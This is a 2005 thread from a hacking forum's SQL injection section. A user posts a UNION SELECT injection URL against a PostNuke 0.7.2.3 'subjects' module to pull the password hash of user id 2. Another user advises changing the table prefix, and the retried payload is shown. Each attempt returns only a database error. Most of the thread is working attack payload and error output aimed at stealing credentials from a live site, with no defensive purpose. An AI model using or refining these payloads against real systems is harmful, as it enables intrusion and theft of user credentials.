|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
PostNuke+SQL-Inj |
|
Posted: Mon Mar 07, 2005 11:01 am |
|
|
xcalibu |
Beginner |
|
|
Joined: Mar 07, 2005 |
Posts: 2 |
|
|
|
|
|
|
|
<meta name="generator" content="PostNuke 0.7.2.3-Phoenix - http://postnuke.com">
+
http://xxx.xxx/index.php?module=subjects&func=viewpage&pageid=1%20UNION%20SELECT%20null,null,pn_pass,null,null,null,null,null%20FROM%20nuke_users%20WHERE%20pn_uid=2/*
=
Error:SELECT pn723_subpages.pageid, pn723_subpages.parentpageid, pn723_subpages.subid, pn723_subjects.subname, pn723_subpages.pagetitle, pn723_subpages.pagecontent, pn723_subpages.pagefile, pn723_subpages.pageimage, pn723_subpages.pageauthor, pn723_subpages.pageauthoremail, pn723_subpages.pageauthorurl, pn723_subpages.pagedatetime, pn723_subpages.pagecounter, pn723_subpages.reviewactive, pn723_subpages.reviewscount, pn723_subpages.reviewsscore, pn723_subjects.catid FROM pn723_subpages, pn723_subjects WHERE pn723_subpages.subid=pn723_subjects.subid AND pn723_subpages.pageid=1 UNION SELECT null,null,pn_pass,null,null,null,null,null FROM nuke_users WHERE pn_uid=2/*
Whats this means? =) |
|
|
|
|
|
|
|
|
Posted: Mon Mar 07, 2005 6:32 pm |
|
|
cXIb8O3 |
Active user |
|
|
Joined: Feb 17, 2005 |
Posts: 26 |
Location: Poland<>Luxembourg |
|
|
|
|
|
|
change prefix in url query... nuke_ to pn723_ |
|
|
|
|
|
|
|
|
Posted: Wed Mar 09, 2005 11:09 am |
|
|
xcalibu |
Beginner |
|
|
Joined: Mar 07, 2005 |
Posts: 2 |
|
|
|
|
|
|
|
cXIb8O3 wrote: | change prefix in url query... nuke_ to pn723_ |
http://xxxx.xxx/index.php?module=subjects&func=viewpage&pageid=1%20UNION%20SELECT%20null,null,pn_pass,null,null,null,null,null%20FROM%20pn723_users%20WHERE%20pn_uid=2/*
Its same:
Error:
SELECT pn723_subpages.pageid, pn723_subpages.parentpageid, pn723_subpages.subid, pn723_subjects.subname, pn723_subpages.pagetitle, pn723_subpages.pagecontent, pn723_subpages.pagefile, pn723_subpages.pageimage, pn723_subpages.pageauthor, pn723_subpages.pageauthoremail, pn723_subpages.pageauthorurl, pn723_subpages.pagedatetime, pn723_subpages.pagecounter, pn723_subpages.reviewactive, pn723_subpages.reviewscount, pn723_subpages.reviewsscore, pn723_subjects.catid FROM pn723_subpages, pn723_subjects WHERE pn723_subpages.subid=pn723_subjects.subid AND pn723_subpages.pageid=1 UNION SELECT null,null,pn_pass,null,null,null,null,null FROM pn723_users WHERE pn_uid=2/* |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|